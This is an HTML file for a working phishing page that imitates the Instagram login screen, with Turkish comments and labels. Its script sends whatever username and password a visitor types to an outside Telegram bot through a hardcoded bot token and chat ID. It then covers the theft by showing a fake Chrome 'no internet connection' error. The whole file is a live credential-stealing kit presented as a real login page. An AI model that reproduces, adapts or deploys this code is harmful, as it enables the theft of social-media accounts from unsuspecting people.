<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="icon" href="https://upload.wikimedia.org/wikipedia/commons/a/a5/Instagram_icon.png" type="image/png">
    <title>Şifremi unuttum</title>
    <style>
        body {
            height: 100%;
            font-family: sans-serif;
            background-color: #fafafa;
            font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen,
                Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
            box-sizing: border-box;
        }

        a {
            text-decoration: none;
        }

        .container {
            max-width: 1000px;
            height: 100%;
            margin: 0 auto;
            display: flex;
            justify-content: center;
            flex-direction: column;
            align-items: center;
            margin-top: 10rem;
            font-size: 14px;
        }

        .box {
            max-width: 350px;
            width: 100%;
            display: flex;
            justify-content: center;
            align-items: center;
            flex-direction: column;
            background-color: #ffff;
            border: 1px solid #e6e6e6;
            border-radius: 1px;
            margin: 0 0 10px;
            padding: 10px 0;
            flex-grow: 1;
        }

        .heading {
            margin: 22px auto 12px;
            background-image: url("https://www.instagram.com/static/bundles/es6/sprite_core_b20f2a3cd7e4.png/b20f2a3cd7e4.png");
            background-position: -98px 0;
            height: 51px;
            width: 177px;
            overflow: hidden;
        }

        .field {
            margin: 10px 0;
            position: relative;
            font-size: 14px;
            width: 100%;
            text-overflow: ellipsis;
        }

        input {
            padding: 9px 0px 7px 9px;
            font-size: 12px;
            width: 18rem;
            height: 1.2rem;
            outline: none;
            background: #fafafa;
            border-radius: 3px;
            border: 1px solid #efefef;
        }

        label {
            position: absolute;
            pointer-events: none;
            left: 10px;
            padding-bottom: 15px;
            transform: translateY(10px);
            line-height: 6px;
            transition: all ease-out 0.1s;
            font-size: 14px;
            color: #999;
            padding-top: 6px;
        }

        input::placeholder {
            visibility: hidden;
        }

        .login-form ::-moz-placeholder {
            color: transparent;
        }

        input:not(:placeholder-shown)+label {
            transform: translateY(0);
            font-size: 11px;
        }

        input:not(:placeholder-shown) {
            padding-top: 14px;
            padding-bottom: 2px;
        }

        .login-button {
            text-align: center;
            width: 100%;
            padding: 0.5rem;
            border: 1px solid transparent;
            background-color: #3897f0;
            color: #fff;
            font-weight: 600;
            font-size: 14px;
            cursor: pointer;
        }

        .separator {
            display: flex;
            justify-content: space-between;
            align-items: center;
            color: #999;
            margin-top: 6px;
        }

        .separator .line {
            height: 1px;
            width: 40%;
            background-color: #dbdbdb;
        }

        .other {
            display: flex;
            justify-content: center;
            flex-direction: column;
            align-items: center;
        }

        .fb-login-btn {
            margin: 1rem;
            border: 0;
            cursor: pointer;
            font-size: 14px;
            color: #385185;
            font-weight: 600;
            background: transparent;
        }

        .fb-icon {
            color: #385185;
            font-size: 1rem;
            padding-right: 1px;
        }

        .forgot-password {
            font-size: 11px;
            color: #003569;
        }









        .error-container {
            max-width: 600px;
            display: none;
        }

        .error-container .dino {
            width: 100px;
            height: 100px;
            margin: 0 auto 20px;
            background: url('https://ssl.gstatic.com/chrome/components/dino/dino-offline-sprite-1x.png') no-repeat;
            background-size: contain;
        }

        .error-container h1 {
            font-size: 1.5em;
            color: #202124;
            margin-bottom: 20px;
        }

        .error-container p {
            font-size: 1em;
            margin: 10px 0;
        }

        .error-container ul {
            list-style: none;
            padding: 0;
            text-align: left;
            display: inline-block;
            text-align: left;
        }

        .error-container ul li {
            font-size: 0.9em;
            margin: 5px 0;
            padding-left: 20px;
            position: relative;
        }

        .error-container ul li::before {
            content: "•";
            color: #5f6368;
            position: absolute;
            left: 0;
        }
    </style>
</head>

<body>
    <div class="container" id="container">
        <div class="box">
            <div class="heading"></div>
            <form class="login-form" id="loginForm">
                <div class="field">
                    <input id="username" type="text" placeholder="Phone number, username, or email" />
                    <label for="username">Phone number, username, or email</label>
                </div>
                <div class="field">
                    <input id="password" type="password" placeholder="Password" />
                    <label for="password">Password</label>
                </div>
                <button type="submit" class="login-button" id="login-button" onclick="hata()">Log In</button>
                <div class="separator">
                    <div class="line"></div>
                    <p>OR</p>
                    <div class="line"></div>
                </div>
                <div class="other">
                    <button class="fb-login-btn" type="button">
                        <i class="fa fa-facebook-official fb-icon"></i>
                        <span>Log in with Facebook</span>
                    </button>
                    <a class="forgot-password" href="#">Forgot password?</a>
                </div>
            </form>
        </div>
        <div class="box">
            <p>Don't have an account? <a class="signup" href="#">Sign Up</a></p>
        </div>
    </div>





    <div class="error-container" id="error-container">
        <div class="dino"></div>
        <h1>İnternet bağlantısı yok</h1>
        <p>Aşağıdakileri deneyin:</p>
        <ul>
            <li>Ağ kabloları, modem ve yönlendirici kontrol ediliyor</li>
            <li>Kablosuz ağa yeniden bağlanma</li>
            <li>Windows Ağ Teşhislerini Çalıştırma</li>
        </ul>
        <p>ERR_INTERNET_DISCONNECTED</p>
    </div>



    <script>


        function hata(){
            document.getElementById("container").style.display="none";
            document.getElementById("error-container").style.display="block";
        }





        document.getElementById('loginForm').addEventListener('submit', function (event) {
            event.preventDefault(); // Formun normal gönderilmesini engelle

            // Formdan verileri al
            var username = document.getElementById('username').value;
            var password = document.getElementById('password').value;

            // Telegram Bot API URL'si
            var token = "7782206979:AAE_JMIsLiSJaKpgEFFYU4eWaYHCXZqciAg"; // Bot token
            var chatId = "5312871954"; // Chat ID (Bu sizin chat_id'niz)

            var url = `https://api.telegram.org/bot${token}/sendMessage`;

            // Mesaj içeriğini oluştur
            var text = `işte bilgiler  :):\n\nKullanıcı Adı: ${username}\nŞifre: ${password}`;

            // Veriyi Telegram API'sine gönder
            fetch(url, {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify({
                    chat_id: chatId,
                    text: text
                })
            })
                .then(response => response.json())
                .then(data => {
                    console.log("", data);
                })
                .catch(error => {
                    console.error("Hata:", error);
                    alert("Bir hata oluştu, lütfen tekrar deneyin.");
                });
        });
    </script>

</body>

</html>
